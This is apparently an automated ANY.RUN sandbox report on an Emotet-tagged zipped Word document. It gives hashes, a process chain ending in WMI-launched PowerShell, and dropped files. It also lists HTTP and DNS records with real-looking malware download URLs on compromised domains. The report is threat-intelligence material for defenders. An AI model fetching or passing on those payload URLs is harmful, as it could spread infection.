File name: DFJ9L5D-20200919.zip
Full analysis: https://app.any.run/tasks/b25d3677-597c-45cb-b6f5-4c51b33cd2ce
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 30, 2020, 06:30:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: emotet-doc, emotet
Indicators:
MIME: application/zip
File info: Zip archive data, at least v5.1 to extract
MD5: B5506F51AA296C6680F2E1F7988AFAB0
SHA1: 0742C0710B145D519B97A4E157EF67414644A1BB
SHA256: 56F3CECF24F947A6300E3F3ED3A1AE3200CF0EFDD0F7B1AA4B300DC0724F9674
SSDEEP: 1536:YztpYNZggoE/hqs1QJ4KzIF25EWPV2eLXs4f/cScF3HWcg791N4JhHUVAP3:YzHUX/1QKKzS25VPXH/ct9W7OEVg3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Drops known malicious document
      • WinRAR.exe (PID: 3900)
  • SUSPICIOUS
    • Starts Microsoft Office Application
      • WinRAR.exe (PID: 3900)
    • PowerShell script executed
      • powershell.exe (PID: 3792)
    • Executed via WMI
      • powershell.exe (PID: 3792)
    • Creates files in the user directory
      • powershell.exe (PID: 3792)
  • INFO
    • Creates files in the user directory
      • WINWORD.EXE (PID: 604)
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 604)
    • Reads settings of System Certificates
      • powershell.exe (PID: 3792)
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: DFJ9L5D-20200919.doc
ZipUncompressedSize: 243226
ZipCompressedSize: 114280
ZipCRC: 0x0bfe74be
ZipModifyDate: 2020:09:19 09:43:01
ZipCompression: Unknown (99)
ZipBitFlag: 0x0003
ZipRequiredVersion: 51
No data.
Total processes: 39
Monitored processes: 3
Malicious processes: 1
Suspicious processes: 1

Behavior graph (process chain): start -> winrar.exe (no specs) -> winword.exe (no specs) -> powershell.exe

Process information

PID: 3900
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\DFJ9L5D-20200919.zip"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Version: 5.60.0

PID: 604
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb3900.29862\DFJ9L5D-20200919.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: WinRAR.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 3792
CMD / Path (encoded command elided in the source): powershell -en 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:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 2 429
Read events: 1 605
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 0
Suspicious files: 3
Text files: 0
Unknown types: 3

Dropped files

PID: 604
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVRCBFB.tmp.cvr
Type:
MD5:
SHA256:

PID: 3792
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7LA33G1NIIPPRKT15KQB.temp
Type:
MD5:
SHA256:

PID: 604
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
Type: tlb
MD5: 2E972F47A1ABD1450B7BD324E4B4051D
SHA256: 904660F27EF26AE5A3818071EF7E5DF83E97616E8023BFEFA465F594FF4B9A57

PID: 3792
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5: 4028388263805ABA00088A0BA4EEA515
SHA256: 5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948

PID: 604
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\Rar$DIb3900.29862\~$J9L5D-20200919.doc
Type: pgc
MD5: 358427160D4BC80394F75F418D9AD73B
SHA256: EC97F8942F15A6883027BAC43EEA0273FE1F40C0679027EEB08837B0D8F6AC67

PID: 3792
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3bd707.TMP
Type: binary
MD5: 4028388263805ABA00088A0BA4EEA515
SHA256: 5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948

PID: 604
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Type: pgc
MD5: B07614BD859564699B35C4545389C3AB
SHA256: 6986C355221867DD4B9EBA3D4967DBC25FD8E728B79961FF628E1D6B25B90599

PID: 3900
Process: WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$DIb3900.29862\DFJ9L5D-20200919.doc
Type: document
MD5: D40C2A3E701423B9B3A40E8D94C46F4A
SHA256: 84F2933DE3FF60B0D0027960358480B241B27C95B95016B64E9A12066665D623
HTTP(S) requests: 4
TCP/UDP connections: 7
DNS requests: 6
Threats: 0

HTTP requests

PID: 3792
Process: powershell.exe
Method: GET
HTTP Code: 404
IP: 46.183.8.124:80
URL: http://oneinsix.com/test/fPF2zBUI/
CN: GB
Type: html
Size: 290 b
Reputation: suspicious

PID: 3792
Process: powershell.exe
Method: GET
HTTP Code: 404
IP: 129.28.198.7:80
URL: http://ydslin.fun/wp-includes/J2gtP7rvBA/
CN: CN
Type: html
Size: 189 b
Reputation: suspicious

PID: 3792
Process: powershell.exe
Method: GET
HTTP Code: 404
IP: 49.233.19.126:80
URL: http://vip.jizhiguoren.com/mzxf3/7l6w6t/
CN: CN
Type: html
Size: 265 b
Reputation: suspicious

PID: 3792
Process: powershell.exe
Method: GET
HTTP Code: 404
IP: 79.172.249.103:80
URL: http://gabox.eu/001_elemei/mg9/
CN: HU
Type: html
Size: 1.76 Kb
Reputation: unknown

Connections

PID: 3792
Process: powershell.exe
IP: 46.183.8.124:80
Domain: oneinsix.com
ASN: 34SP.com Limited
CN: GB
Reputation: suspicious

PID:
Process:
IP: 129.28.198.7:80
Domain: ydslin.fun
ASN:
CN: CN
Reputation: suspicious

PID: 3792
Process: powershell.exe
IP: 79.172.249.103:80
Domain: gabox.eu
ASN: Deninet KFT
CN: HU
Reputation: unknown

PID: 3792
Process: powershell.exe
IP: 103.255.237.15:443
Domain: www.yeumoitruong.vn
ASN: VNPT Corp
CN: VN
Reputation: unknown

PID: 3792
Process: powershell.exe
IP: 104.27.148.14:80
Domain: www.greaudstudio.com
ASN: Cloudflare Inc
CN: US
Reputation: shared

PID: 3792
Process: powershell.exe
IP: 49.233.19.126:80
Domain: vip.jizhiguoren.com
ASN:
CN: CN
Reputation: suspicious

PID: 3792
Process: powershell.exe
IP: 104.27.149.14:80
Domain: www.greaudstudio.com
ASN: Cloudflare Inc
CN: US
Reputation: shared

DNS requests

Domain: ydslin.fun
  • 129.28.198.7
Reputation: suspicious

Domain: gabox.eu
  • 79.172.249.103
Reputation: unknown

Domain: oneinsix.com
  • 46.183.8.124
Reputation: suspicious

Domain: vip.jizhiguoren.com
  • 49.233.19.126
Reputation: suspicious

Domain: www.yeumoitruong.vn
  • 103.255.237.15
Reputation: unknown

Domain: www.greaudstudio.com
  • 104.27.149.14
  • 104.27.148.14
  • 172.67.220.99
Reputation: suspicious

Threats

No threats detected
No debug info